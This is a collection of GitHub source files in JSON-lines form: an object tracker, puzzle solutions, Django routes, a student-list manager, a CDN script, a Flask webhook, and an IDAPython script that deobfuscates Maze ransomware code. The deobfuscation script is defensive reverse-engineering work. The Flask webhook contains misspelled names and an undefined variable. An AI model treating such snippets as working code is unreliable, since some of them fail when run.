boxes = np.array([d.tlwh for d in detections])\n scores = np.array([d.confidence for d in detections])\n indices = non_max_suppression(boxes, self.nms_max_overlap, scores) # Here, nms_max_overlap is 1\n detections = [detections[i] for i in indices]\n\n # update tracker ********************************************************************************************\n self.tracker.predict() # predict based on t-1 info\n # for first frame, this function do nothing\n\n # detections is the measurement results as time T\n self.tracker.update(detections, classes, confidences)\n \n # output bbox identities ************************************************************************************\n # output bbox identities\n outputs = []\n for track in self.tracker.tracks:\n if not track.is_confirmed() or track.time_since_update > 0:\n continue\n\n box = track.to_tlwh()\n x1, y1, x2, y2 = self._tlwh_to_xyxy(box)\n \n track_id = track.track_id\n class_id = track.class_id\n conf = track.conf\n outputs.append(np.array([x1, y1, x2, y2, track_id, class_id, conf]))\n if len(outputs) > 0:\n outputs = np.stack(outputs, axis=0)\n return outputs\n\n \"\"\"\n TODO:\n Convert bbox from xc_yc_w_h to xtl_ytl_w_h\n Thanks JieChen91@github.com for reporting this bug!\n \"\"\"\n\n \nclass DeepSortFaceSingle(object):\n def __init__(self, model_path, max_dist=0.2, min_confidence=0.3, nms_max_overlap=1.0, max_iou_distance=0.7,\n max_age=70, n_init=3, nn_budget=100, use_cuda=True):\n self.min_confidence = min_confidence\n self.nms_max_overlap = nms_max_overlap\n self.trackers = {}\n self.extractors = {}\n\n # create a tracker and re-identification model for each class\n for i in range(51):\n metric = NearestNeighborDistanceMetric(\"cosine\", max_dist, nn_budget)\n tracker = Tracker(metric, max_iou_distance=max_iou_distance, max_age=max_age, n_init=n_init)\n self.trackers[i] = tracker\n self.extractors[i] = ModelExtractor(use_cuda=use_cuda)\n\n def update(self, bbox_xywh, confidences, classes, ori_img):\n self.height, self.width = ori_img.shape[:2]\n outputs = []\n\n\n #classes= []\n #for i in range(1, len(classes) + 1):\n #classes=['']\n for i in range(51):\n tracker = self.trackers[i]\n extractor = self.extractors[i]\n\n # filter detections by class\n class_mask = (classes == i)\n class_bbox_xywh = bbox_xywh[class_mask]\n class_confidences = confidences[class_mask]\n\n if len(class_bbox_xywh) == 0:\n continue\n\n # get appearance feature with neural network\n features = self._get_features(class_bbox_xywh, ori_img)\n\n bbox_tlwh = self._xywh_to_tlwh(class_bbox_xywh)\n\n # generate detections for this class\n detections = [Detection(bbox_tlwh[j], conf, features[j]) for j, conf in enumerate(class_confidences) if\n conf > self.min_confidence]\n\n # run non-maximum suppression\n boxes = np.array([d.tlwh for d in detections])\n scores = np.array([d.confidence for d in detections])\n indices = non_max_suppression(boxes, self.nms_max_overlap, scores)\n detections = [detections[j] for j in indices]\n\n # update tracker\n tracker.predict()\n tracker.update(detections)\n\n # output bbox identities\n for track in tracker.tracks:\n if not track.is_confirmed() or track.time_since_update > 1:\n continue\n\n box = track.to_tlwh()\n x1, y1, x2, y2 = self._tlwh_to_xyxy(box)\n\n track_id = track.track_id\n class_id = i\n conf = track.confidence\n outputs.append(np.array([x1, y1, x2, y2, track_id, class_id, conf]))\n\n if len(outputs) > 0:\n outputs = np.stack(outputs, axis=0)\n return outputs\n\n\n \n @staticmethod\n def _xywh_to_tlwh(bbox_xywh):\n if isinstance(bbox_xywh, np.ndarray):\n bbox_tlwh = bbox_xywh.copy()\n elif isinstance(bbox_xywh, torch.Tensor):\n bbox_tlwh = bbox_xywh.clone()\n bbox_tlwh[:, 0] = bbox_xywh[:, 0] - bbox_xywh[:, 2] / 2.\n bbox_tlwh[:, 1] = bbox_xywh[:, 1] - bbox_xywh[:, 3] / 2.\n return bbox_tlwh\n\n def _xywh_to_xyxy(self, bbox_xywh):\n x, y, w, h = bbox_xywh # xc, yc, w, h\n x1 = max(int(x - w / 2), 0)\n x2 = min(int(x + w / 2), self.width - 1)\n y1 = max(int(y - h / 2), 0)\n y2 = min(int(y + h / 2), self.height - 1)\n return x1, y1, x2, y2\n\n def _tlwh_to_xyxy(self, bbox_tlwh):\n \"\"\"\n TODO:\n Convert bbox from xtl_ytl_w_h to xc_yc_w_h\n Thanks JieChen91@github.com for reporting this bug!\n \"\"\"\n x, y, w, h = bbox_tlwh\n x1 = max(int(x), 0)\n x2 = min(int(x + w), self.width - 1)\n y1 = max(int(y), 0)\n y2 = min(int(y + h), self.height - 1)\n return x1, y1, x2, y2\n\n def _xyxy_to_tlwh(self, bbox_xyxy):\n x1, y1, x2, y2 = bbox_xyxy\n\n t = x1\n l = y1\n w = int(x2 - x1)\n h = int(y2 - y1)\n return t, l, w, h\n\n def _get_features(self, bbox_xywh, ori_img):\n \"\"\"\n :param bbox_xywh:\n :param ori_img: cv2 array (h,w,3)\n :return:\n \"\"\"\n im_crops = []\n for box in bbox_xywh:\n x1, y1, x2, y2 = self._xywh_to_xyxy(box)\n im = ori_img[y1:y2, x1:x2]\n #data = Image .fromarray(im)\n im_crops.append(im)\n if im_crops:\n # features = self.extractor.get_features(im_crops)\n features = self.extractor(im_crops)\n else:\n features = np.array([])\n return features\n\n\n\n\n\n","repo_name":"akashAD98/yolov7_vino_with_object_tracking","sub_path":"deep_sort/deep_sort_object.py","file_name":"deep_sort_object.py","file_ext":"py","file_size_in_byte":8768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"12898865925","text":"\"\"\"\nFormula:\nhttps://math.hmc.edu/funfacts/fibonacci-number-formula/\n\"\"\"\nfrom __future__ import annotations\nimport math\n\n\nsqrt_from_5 = math.sqrt(5)\nPhi_n = (1 + sqrt_from_5) / 2\nphi_n = (1 - sqrt_from_5) / 2\n\n\ndef fib(n: int) -> int:\n \"\"\"\n This implementation a lot faster then\n one belowe because of formula above.\n \"\"\"\n return int((math.pow(Phi_n, n) - math.pow(phi_n, n)) / sqrt_from_5)\n\n\ndef nobby_fib(n: int) -> int:\n if n == 0:\n return 1\n elif n == 1:\n return 2\n else:\n return nobby_fib(n-1) + nobby_fib(n-2)\n\n\ndef main() -> int:\n\n FIB_LIMIT: int = 4000000\n\n even_fib_sum = 0\n n = 0\n fib_n = fib(n)\n\n while fib_n <= FIB_LIMIT:\n \n if fib_n % 2 == 0:\n print(f\"+[{n}] {fib_n}\")\n even_fib_sum += fib_n\n else:\n print(f\"-[{n}] {fib_n}\") \n \n n += 1\n fib_n = fib(n)\n\n print(f\"Answer: {even_fib_sum}\")\n\n return 0\n\n\nif __name__ == \"__main__\":\n raise SystemExit(main())\n","repo_name":"gr3yknigh1/project-euler-solutions","sub_path":"py/solution-02.py","file_name":"solution-02.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"12492643760","text":"import sys\n\nl_to_int = lambda l: list(map(lambda s: int(s), l))\nl_to_str = lambda l: list(map(lambda s: str(s), l))\n\n\ndef get_first_suitable_n(low):\n n_as_l = l_to_int(list(str(low)))\n min_n = None\n has_dup = False\n for i in range(len(n_as_l)):\n if min_n is None or n_as_l[i] > min_n:\n min_n = n_as_l[i]\n elif n_as_l[i] < min_n:\n n_as_l[i] = min_n\n if i > 0:\n if n_as_l[i] == n_as_l[i - 1]:\n has_dup = True\n if not has_dup:\n n_as_l[-2] = n_as_l[-1]\n return int(''.join(l_to_str(n_as_l)))\n\n\ndef generate(low, high):\n while True:\n low = get_first_suitable_n(low)\n if low < high:\n yield low\n else:\n return\n low += 1\n\n\nif __name__ == '__main__':\n lower, upper = 146810, 612564\n # lower, upper = int(sys.argv[1]), int(sys.argv[2])\n ns = list(generate(lower, upper))\n\n print(len(ns))\n","repo_name":"AbelPelser/AdventOfCode2019","sub_path":"Day4/day4_part1.py","file_name":"day4_part1.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"16600792893","text":"from calendar import c\nfrom django.contrib import admin\nfrom django.urls import path\nfrom pedia_app import views\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('', views.index, name='index'),\n path('register/', views.register_req, name='register'),\n path('login/', views.login_req, name='login'),\n path('logout/', views.logout_req, name='logout'),\n path('teams/', views.teams, name='teams'),\n path('matches/', views.matches, name='matches'),\n path('tournies/', views.tournies, name='tournies'),\n path('players/', views.players, name='players'),\n path('edit_matches/', views.edit_matches, name='edit_matches'),\n path('edit_teams/', views.edit_teams, name='edit_teams'),\n path('edit_tournies/', views.edit_tournies, name='edit_tournies'),\n path('edit_players/', views.edit_players, name='edit_players'),\n path('edit_news_all/', views.edit_news_all, name='edit_news_all'),\n path('edit_match/', views.edit_match, name='edit_match'),\n path('edit_team/', views.edit_team, name='edit_team'),\n path('edit_tourney/', views.edit_tourney, name='edit_tourney'),\n path('edit_player/', views.edit_player, name='edit_player'),\n path('edit_news/', views.edit_news, name='edit_news'),\n path('delete_match/', views.delete_match, name='delete_match'),\n path('delete_team/', views.delete_team, name='delete_team'),\n path('delete_tourney/', views.delete_tourney, name='delete_tourney'),\n path('delete_player/', views.delete_player, name='delete_player'),\n path('delete_news/', views.delete_news, name='delete_news'),\n path('feedback/', views.feedback, name='feedback'),\n path('show_feedbacks/', views.show_feedbacks, name='show_feedbacks'),\n]","repo_name":"doas-ice/Qpedia-Django","sub_path":"qpedia_project/pedia_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1811,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"51"} +{"seq_id":"31537063615","text":"from Alumno import claseAlumno\r\nimport csv\r\nclass claseManejador:\r\n __lista = [] #lista de alumnos de la materia\r\n __listaAprob = [] #lista de alumnos aprobados\r\n __listaDesaprob = [] #lista de alumnos desaprobados\r\n __archivo = None #archivo csv\r\n def __init__(self, lista = [], archivo = open('Lista de Alumnos.csv'), listaA = [], listaD = []):\r\n self.__lista = lista\r\n self.__listaAprob = listaA\r\n self.__listaDesaprob = listaD\r\n self.__archivo = archivo\r\n def crearListaArchivo(self): #crea la lista de alumnos de la materia\r\n reader = csv.reader(self.__archivo, delimiter = ';')\r\n band = True\r\n for fila in reader:\r\n if(band == True):\r\n band = False\r\n else:\r\n unAlumno = claseAlumno(str(fila[0]), str(fila[1]), str(fila[2]), float(fila[3]))\r\n self.__lista.append(unAlumno)\r\n def crearListaAprob(self): #crea la lista de alumnos aprobados ordenados por apellido\r\n for i in range(len(self.__lista)):\r\n if(float(self.__lista[i].getNota() >= 7)):\r\n self.__listaAprob.append(self.__lista[i]) #agrega el alumno aprobado a la nueva lista\r\n def crearListaDesaprob(self): #crea la lista de alumnos desaprobados\r\n for i in range(len(self.__lista)):\r\n if(float(self.__lista[i].getNota() < 7)):\r\n self.__listaDesaprob.append(self.__lista[i]) #agrega el alumno desaprobado a la nueva lista\r\n def ordenar(self):\r\n for i in range(len(self.__lista) - 2): #se ordena la lista general\r\n min = i\r\n for j in range(i + 1, len(self.__lista) - 1):\r\n if(str(self.__lista[j].getApe()) < str(self.__lista[min].getApe())):\r\n min = j\r\n aux = self.__lista[i]\r\n self.__lista[i] = self.__lista[min]\r\n self.__lista[min] = aux\r\n for i in range(len(self.__listaAprob) - 2): #se ordena la lista de DESAPROBADOS por apellido\r\n min = i\r\n for j in range(i + 1, len(self.__listaAprob) - 1):\r\n if (str(self.__listaAprob[j].getApe()) < str(self.__listaAprob[min].getApe())):\r\n min = j\r\n aux = self.__listaAprob[i]\r\n self.__listaAprob[i] = self.__listaAprob[min]\r\n self.__listaAprob[min] = aux\r\n for i in range(len(self.__listaDesaprob) - 2): # se ordena la lista de DESAPROBADOS por apellido\r\n min = i\r\n for j in range(i + 1, len(self.__listaDesaprob) - 1):\r\n if (str(self.__listaDesaprob[j].getApe()) < str(self.__listaDesaprob[min].getApe())):\r\n min = j\r\n aux = self.__listaDesaprob[i]\r\n self.__listaDesaprob[i] = self.__listaDesaprob[min]\r\n self.__listaDesaprob[min] = aux\r\n def printLista(self): #muestra la lista completa\r\n for i in range(len(self.__lista)):\r\n self.__lista[i].mostrar()\r\n def printAprob(self): #muestra la lista de alumnos aprobados\r\n for i in range(len(self.__listaAprob)):\r\n self.__listaAprob[i].mostrar()\r\n def printDesaprob(self): #muestra la lista de alumnos desaprbados\r\n for i in range(len(self.__listaDesaprob)):\r\n self.__listaDesaprob[i].mostrar()\r\n def añadirAlumno(self, nom, ape, reg, nota):\r\n unAlumno = claseAlumno(nom, ape, reg, nota)\r\n self.__lista.append(unAlumno)\r\n def removeAlumno(self, alum):\r\n band = [0,0,0]\r\n pos = [0,0,0]\r\n i = 0\r\n while(i < len(self.__lista) and band[0] == 0): #busca el alumno en la lista general\r\n alumInLista = self.__lista[i].getApe() + '-' + self.__lista[i].getNom()\r\n if(alum == alumInLista):\r\n band[0] = 1\r\n pos[0] = i\r\n i+=1\r\n i = 0\r\n while(i < len(self.__listaAprob) and band[1] == 0): #busca el alumno en la lista de aprobados\r\n alumInLista = self.__listaAprob[i].getApe() + '-' + self.__listaAprob[i].getNom()\r\n if(alum == alumInLista):\r\n band[1] = 1\r\n pos[1] = i\r\n i+=1\r\n i = 0\r\n while(i < len(self.__listaDesaprob) and band[2] == 0): #busca el alumno en la lista de desaprobados\r\n alumInLista = self.__listaDesaprob[i].getApe() + '-' + self.__listaDesaprob[i].getNom()\r\n if(alum == alumInLista):\r\n band[2] = 1\r\n pos[2] = i\r\n i+=1\r\n\r\n if (band == [1,1,0] or band == [1,0,1]): #se elimina el alumno en las dos listas posibles\r\n print('DATO: alumno encontrado')\r\n if(band == [1,1,0]):\r\n self.__lista.pop(pos[0])\r\n self.__listaAprob.pop(pos[1])\r\n elif(band == [1,0,1]):\r\n self.__lista.pop(pos[0])\r\n self.__listaDesaprob.pop(pos[2])\r\n else:\r\n print('ERROR: alumno no encontrado')\r\n def reverse(self, op): #invierte las listas\r\n if(op == 1):\r\n self.__lista.reverse()\r\n elif(op == 2):\r\n self.__listaAprob.reverse()\r\n elif(op == 3):\r\n self.__listaDesaprob.reverse()\r\n else:\r\n print('ERROR: opción no válida')","repo_name":"Al3x-BB/Tarea-de--nvestigaci-n","sub_path":"Manejador.py","file_name":"Manejador.py","file_ext":"py","file_size_in_byte":5298,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"2418163322","text":"# @File : CDN_select.py\n# @Author: Sun Peishuai\n# @Date : 2020/12/16\nimport sys\nsys.path.insert(0,\"..\")\n\nfrom database.database import session, A, CNAME\nfrom utils.utils import logger_database as logger\nfrom utils.config import ip2name\ndef select_CDN(session):\n cdn_list=[]\n all_dns=set(session.query(CNAME.dns2).all())\n for cname in all_dns:\n try:\n ip_area=session.query(A.ip, A.area).filter_by(dns=cname[0]).all()\n\n ip_area=set(item[0][::-1].split(\".\",1)[1]+item[1] for item in ip_area)\n if len(ip_area)>=2:\n cdn_list.append(cname[0])\n except:\n print(ip_area)\n\n return cdn_list,len(cdn_list)\n\ncdn_list,length=select_CDN(session)\nprint(length)\nwith open(\"cdn_list.txt\",\"w\",encoding=\"utf-8\") as w:\n for cdn in cdn_list:\n w.write(cdn)\n w.write(\"\\n\")\n\n\n\n\n\n\n\n","repo_name":"sunhanwu/cdn_detector","sub_path":"database/CDN_select.py","file_name":"CDN_select.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"51"} +{"seq_id":"6419368893","text":"# app.py\r\nimport json\r\nimport os\r\n#import request\r\n\r\nfrom flask import Flask\r\nfrom flask import request\r\nfrom flask import make_response\r\n\r\n\r\napp = Flask(__name__) # create an app instance\r\n\r\n#@app.route(\"/\") # at the end point /\r\n#def hello(): # call method hello\r\n# return \"Hello World ZT!\" # which returns \"hello world\"\r\n#@app.route('/projects/')\r\n#def projects():\r\n# return 'The project page'\r\n\r\n#@app.route('/about')\r\n#def about():\r\n# return 'The about page'\r\nif __name__ == \"__main__\": # on running python app.py\r\n app.run() # run the flask app\r\n\r\n\r\n\r\n@app.route('/webhook',methods=['POST'])\r\n\r\ndef webhook():\r\n req = request.get_json(silemt=True,force=True)\r\n print(json.dumps(req,indent=4))\r\n res = makeResponse(req)\r\n res = json.dumps(res, indent = 4)\r\n r = make_response(res)\r\n r.headers['Content-Type'] = 'application/json'\r\n return r\r\n\r\ndef makeRespomse(req):\r\n result = req.get(\"queryResult\")\r\n parameters = result.get(\"parameters\")\r\n city = parameters.get(\"geo_city\")\r\n# r = requests.get('https://api.openweathermap.org/data/2.5/weather?q='+city+'&appid=6969565fadecbd630d53a3a3551894c6')\r\n# condition=weather['weather'][0]['description']\r\n r = get_data()\r\n return r \r\n\r\n \r\n\r\n\r\ndef get_data(): \r\n# speech = \"the forecast value for \"+city+\" is \"+condition\r\n return{\r\n \"speech\":\"shailaja Jha\",\r\n \"fulfillmentText\":speech\r\n# \"source\": \"apiai_checkweather_webhook\"\r\n }\r\n \r\n\r\n \r\n#if __name__ =='__main__':\r\n#port = int(os.getenv('port',5000))\r\n#print(\"starting app on port %d\"%port)\r\n#app.run(debug=False, port=port,host='0.0.0.0')\r\n","repo_name":"shailajajha/webhook-for-weatherbot2","sub_path":"webhook.py","file_name":"webhook.py","file_ext":"py","file_size_in_byte":1710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"41591379702","text":"import logging\nfrom datetime import datetime\n\nfrom src.db.connection import DatabaseConnector\nfrom src.entity.historie_pohybu_polozky import HistoriePohybuPolozky\n\n\nclass HistoriePohybuPolozkyController:\n def __init__(self):\n self.historie_pohybu_polozek_model = HistoriePohybuPolozky()\n logging.basicConfig(filename='log/logging.log', level=logging.DEBUG)\n now = datetime.now()\n self.current_time = now.strftime(\"%Y-%m-%d %H:%M:%S\")\n try:\n self.connection, self.cursor = DatabaseConnector().pripojeni()\n except Exception as err:\n print(\"Došlo k chybě při připojení k databázi\", err)\n logging.error(f\"{self.current_time}Nepodařilo se připojit k tabulce historie pohybu polozek: {err}\")\n\n def zobrazit_historii_pohybu_polozek(self):\n self.historie_pohybu_polozek_model.findAll()\n\n def zobrazit_historii_pohybu_polozek_podle_puvodni_lokace(self):\n \"\"\"\n Metoda kontroluje vstup a volá metodu pro zobrazení historie pohybu polozek podle puvodní lokace\n \"\"\"\n try:\n nazev_puvodni_lokace = input(\"Zadejte název původní lokace: \")\n self.historie_pohybu_polozek_model.findByPuvodniLokace(nazev_puvodni_lokace)\n except Exception as e:\n print(\"Došlo k neznámé chybě: \", e)\n\n def zobrazit_historii_pohybu_polozek_podle_nove_lokace(self):\n \"\"\"\n Metoda kontroluje vstup a volá metodu pro zobrazení historie pohybu polozek podle nové lokace\n \"\"\"\n try:\n nazev_nove_lokace = input(\"Zadejte název nové lokace: \")\n self.historie_pohybu_polozek_model.findByNoveLokace(nazev_nove_lokace)\n except Exception as e:\n print(\"Došlo k neznámé chybě: \", e)\n\n def zobrazit_historii_pohybu_polozky_od_nejnovejsiho(self):\n \"\"\"\n Metoda kontroluje vstup a volá metodu pro zobrazení historie pohybu vybrané položky od nejnovějších záznamů\n \"\"\"\n try:\n nazev_polozky = input(\"Zadejte název položky: \")\n self.historie_pohybu_polozek_model.findByPolozkaOdNejnovejsiho(nazev_polozky)\n except Exception as e:\n print(\"Došlo k neznámé chybě: \", e)\n\n def zobrazit_historii_pohybu_polozky_od_nejstarsiho(self):\n \"\"\"\n Metoda kontroluje vstup a volá metodu pro zobrazení historie pohybu vybrané položky od nejstarších záznamů\n \"\"\"\n try:\n nazev_polozky = input(\"Zadejte název položky: \")\n self.historie_pohybu_polozek_model.findByPolozkaOdNejstarsiho(nazev_polozky)\n except Exception as e:\n print(\"Došlo k neznámé chybě: \", e)\n\n","repo_name":"DominikSliva/WarehouseApp","sub_path":"src/controllers/historie_pohybu_polozek_controller.py","file_name":"historie_pohybu_polozek_controller.py","file_ext":"py","file_size_in_byte":2708,"program_lang":"python","lang":"cs","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"73074854558","text":"# coding=utf-8\n\"\"\"\nIdaPython script for Maze ransomware deobfuscation.\nTested on IDA 7.5 with Python3\n\"\"\"\n\nimport ida_idaapi\nimport ida_bytes\nimport idc\n\n__author__ = \"Vladyslav Bahlai\"\n__email__ = \"baglai.vlad@gmail.com\"\n\n\ndef fill_with_nops(start, stop):\n for p in range(start, stop):\n ida_bytes.patch_byte(p, 0x90)\n idc.create_insn(p)\n\n idc.create_insn(stop)\n\n\ndef _pattern_len(pattern):\n return len(pattern) // 3 + 1 if len(pattern) % 3 else 0\n\n\ndef resolve_obf_calls(ea):\n next_instr_addr = idc.get_wide_dword(ea + 1)\n\n first_jmp_target = (ea + idc.get_wide_dword(ea + 0x7) + 0xB) & 0xFFFFFFFF\n second_jmp_target = (ea + idc.get_wide_dword(ea + 0xD) + 0x11) & 0xFFFFFFFF\n\n if first_jmp_target != second_jmp_target:\n return\n\n call_param = (first_jmp_target - ea - 5) & 0xFFFFFFFF\n\n # Now we can replace all code till next instruction's address with NOPs\n fill_with_nops(ea, next_instr_addr)\n\n # Insert CALL\n ida_bytes.patch_byte(ea, 0xE8) # CALL\n ida_bytes.patch_dword(ea + 1, call_param)\n idc.create_insn(ea)\n\n return True\n\n\ndef cleanup_resolveapi_calls(ea):\n delta = 0 if idc.get_wide_byte(ea) == 0x6A else 3\n\n intermediate_call_target = idc.get_wide_dword(ea + 8 + delta)\n if intermediate_call_target > 0x40:\n return\n\n # Check if we got library name\n if idc.get_wide_dword(ea + intermediate_call_target + 8 + delta) != 0x006c6c64: # \"dll\\x00\"\n return\n\n # Check if we got enough space for patching\n if idc.get_wide_dword(ea + intermediate_call_target + 0x11 + delta) != 0x90909090 or \\\n idc.get_wide_byte(ea + intermediate_call_target + 0x15 + delta) != 0x90:\n return\n\n idc.patch_byte(ea + 7 + delta, 0xEB)\n idc.patch_byte(ea + 8 + delta, intermediate_call_target + 3)\n fill_with_nops(ea + 9 + delta, ea + 0xC + delta)\n idc.create_insn(ea + 7 + delta)\n\n # Now we need to pass module name parameter through stack\n resolve_api_call_param = idc.get_wide_dword(ea + intermediate_call_target + 0xD + delta)\n resolve_api_call_param = resolve_api_call_param - 5 # offset due to inserted PUSH command\n\n # Insert new PUSH command\n idc.patch_byte(ea + intermediate_call_target + 0xC + delta, 0x68)\n idc.patch_dword(ea + intermediate_call_target + 0xD + delta, ea + 0xC + delta)\n idc.create_insn(ea + intermediate_call_target + 0xC + delta)\n\n # Restore call ResolveApi\n idc.patch_byte(ea + intermediate_call_target + 0x11 + delta, 0xE8)\n idc.patch_dword(ea + intermediate_call_target + 0x12 + delta, resolve_api_call_param)\n idc.create_insn(ea + intermediate_call_target + 0x11 + delta)\n \n return True\n\n\ndef resolve_calls_through_register(ea):\n next_instr_addr = idc.get_wide_dword(ea + 1)\n\n # Check if that's just a parameter passing through stack\n if ea & 0xFFFF0000 != next_instr_addr & 0xFFFF0000:\n return\n\n if next_instr_addr - ea > 0x100:\n return\n\n if idc.get_wide_byte(ea + 6) & 0xF0 in [0x20, 0xE0]:\n call_param = 0x9000 + idc.get_wide_byte(ea + 6) ^ 0x30\n else:\n call_param = idc.get_wide_word(ea + 6) ^ 0x30\n\n fill_with_nops(ea, next_instr_addr)\n idc.patch_byte(ea, 0xFF)\n idc.patch_word(ea + 1, call_param)\n idc.create_insn(ea)\n\n return True\n\n\ndef deobfuscate_rets(ea):\n if idc.get_wide_byte(ea) == 0x83:\n fill_with_nops(ea, ea + 7)\n else:\n fill_with_nops(ea, ea + 8)\n\n idc.patch_byte(ea, 0xC3)\n idc.create_insn(ea)\n\n return True\n\n\ndef simplify_jumps(ea):\n # If we got long first conditional jump\n if idc.get_wide_byte(ea) == 0x0F:\n alternative_jmp_cmd = idc.get_wide_byte(ea + 1) ^ 1\n interm_jmp_offt = 6\n else:\n alternative_jmp_cmd = idc.get_wide_byte(ea) ^ 0xF1\n interm_jmp_offt = 2\n\n # Get intermediate jump's value\n if idc.get_wide_byte(ea + interm_jmp_offt) == 0x0F:\n interm_jmp_param = idc.get_wide_dword(ea + interm_jmp_offt + 2)\n final_jmp_addr = ea + interm_jmp_param + interm_jmp_offt + 6\n else:\n interm_jmp_param = idc.get_wide_byte(ea + interm_jmp_offt + 1)\n final_jmp_addr = ea + interm_jmp_param + interm_jmp_offt + 2\n\n # Check the last conditional jump\n\n # 75 ?? ... 0F 85 ?? ?? ?? ??\n if idc.get_wide_byte(final_jmp_addr) == 0x0F and \\\n idc.get_wide_byte(final_jmp_addr + 1) == alternative_jmp_cmd:\n final_jmp_param = idc.get_wide_dword(final_jmp_addr + 2)\n final_jmp_target = (final_jmp_addr + final_jmp_param + 6) & 0xFFFFFFFF\n\n # 75 ?? ... 75 ??\n elif idc.get_wide_byte(final_jmp_addr) ^ 0xF0 == alternative_jmp_cmd:\n final_jmp_param = idc.get_wide_byte(final_jmp_addr + 1)\n final_jmp_target = (final_jmp_addr + final_jmp_param + 2) & 0xFFFFFFFF\n\n # Make a little cleanup: remove garbage code\n elif interm_jmp_param < 0x10:\n fill_with_nops(ea + interm_jmp_offt, final_jmp_addr)\n return True\n\n else:\n return\n\n if final_jmp_target - ea < 0xFF:\n fill_with_nops(ea + interm_jmp_offt, final_jmp_target)\n else:\n fill_with_nops(ea + interm_jmp_offt, final_jmp_addr + 6)\n\n # Restore seconds jump\n idc.patch_byte(ea + interm_jmp_offt, 0x0F)\n idc.patch_byte(ea + interm_jmp_offt + 1, alternative_jmp_cmd)\n idc.patch_dword(ea + interm_jmp_offt + 2, final_jmp_target - (ea + interm_jmp_offt) - 6)\n idc.create_insn(ea + interm_jmp_offt)\n\n return True\n\n\n# EBCB7F550D19227E554F83A65EA422D9163AB6E437F30AEC4D71FD12F0D26AFB\nPATCH_DATA = [\n (\n [\n # .text:00422F6B 0F 84 AF E5 FD FF jz loc_401520\n # .text:00422F71 75 04 jnz short loc_422F77\n # ...\n # .text:00422F77 75 10 jnz short loc_422F89\n\n # .text:00401CB0 0F 84 AD 63 03 00 jz sub_438063\n # .text:00401CB6 75 04 jnz short loc_401CBC\n # ...\n # .text:00401CBC 0F 85 A1 63 03 00 jnz sub_438063\n \"0F 84 ?? ?? ?? ?? 75 ??\",\n\n # .text:00422F89 0F 85 80 00 00 00 jnz loc_42300F\n # .text:00422F8F 74 04 jz short loc_422F95\n # ...\n # .text:00422F95 74 0A jz short loc_422FA1\n \"0F 85 ?? ?? ?? ?? 74 ??\",\n\n # .text:00401FC4 74 2A jz short loc_401FF0\n # .text:00401FC6 75 04 jnz short loc_401FCC\n # ...\n # .text:00401FCC 75 0A jnz short loc_401FD8\n \"74 ?? 75 ??\",\n\n \"75 ?? 74 ??\",\n\n # .text:00422F6B 0F 84 AF E5 FD FF jz ResolveApi\n # .text:00422F71 0F 85 98 00 00 00 jnz loc_42300F\n # ...\n # .text:0042300F 0F 85 0B E5 FD FF jnz ResolveApi\n \"0F 84 ?? ?? ?? ?? 0F 85 ?? ?? ?? ??\",\n\n \"0F 85 ?? ?? ?? ?? 0F 84 ?? ?? ?? ??\"\n ],\n simplify_jumps\n ),\n (\n [\n # .text:00422F66 68 28 31 42 00 push offset loc_423128\n # .text:00422F6B 0F 84 AF E5 FD FF jz loc_401520\n # .text:00422F71 0F 85 A9 E5 FD FF jnz loc_401520\n \"68 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 0F 85 ?? ?? ?? ??\",\n\n \"68 ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 0F 84 ?? ?? ?? ??\"\n ],\n resolve_obf_calls\n ),\n (\n [\n # .text:00435E2C 004 68 C6 11 00 00 push 11C6h ; XorModifier\n # .text:00435E31 008 68 7A 14 8F 2F push 2F8F147Ah ; ApiHash\n # .text:00435E36 00C E8 0D 00 00 00 call loc_435E48\n # .text:00435E3B 000 6B 65 72 6E 65 6C 33 32 2E 64+aKernel32Dll_0 db 'kernel32.dll',0\n # .text:00435E48 000 E8 D3 B6 FC FF call ResolveApi\n \"68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ??\",\n\n # .text:0043492C 6A 7C push 7Ch ; '|' ; XorModifier\n # .text:0043492E 68 17 04 F7 15 push 15F70417h ; ApiHash\n # .text:00434933 E8 0D 00 00 00 call loc_434945\n # .text:00434938 6B 65 72 6E 65 6C 33 32 2E 64+ aKernel32Dll_28 db 'kernel32.dll',0\n # .text:00434945 E8 D6 CB FC FF call ResolveApi\n \"6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ??\"\n ],\n cleanup_resolveapi_calls\n ),\n (\n [\n # .text:00428DD7 68 E3 8D 42 00 push offset unk_428DE3\n # .text:00428DDC FF 60 0C jmp dword ptr [eax+0Ch]\n \"68 ?? ?? ?? ?? FF 60 ??\",\n \"68 ?? ?? ?? ?? FF 61 ??\",\n \"68 ?? ?? ?? ?? FF 62 ??\",\n \"68 ?? ?? ?? ?? FF 63 ??\",\n \"68 ?? ?? ?? ?? FF 64 ??\",\n \"68 ?? ?? ?? ?? FF 65 ??\",\n \"68 ?? ?? ?? ?? FF 66 ??\",\n \"68 ?? ?? ?? ?? FF 67 ??\",\n\n # .text:00435F9B 01C 68 B6 5F 43 00 push offset loc_435FB6\n # .text:00435FA0 020 FF E7 jmp edi\n \"68 ?? ?? ?? ?? FF E0\",\n \"68 ?? ?? ?? ?? FF E1\",\n \"68 ?? ?? ?? ?? FF E2\",\n \"68 ?? ?? ?? ?? FF E3\",\n \"68 ?? ?? ?? ?? FF E4\",\n \"68 ?? ?? ?? ?? FF E5\",\n \"68 ?? ?? ?? ?? FF E6\",\n \"68 ?? ?? ?? ?? FF E7\",\n\n # .text:00425A13 68 39 5A 42 00 push offset loc_425A39\n # .text:00425A18 FF 20 jmp dword ptr [eax]\n \"68 ?? ?? 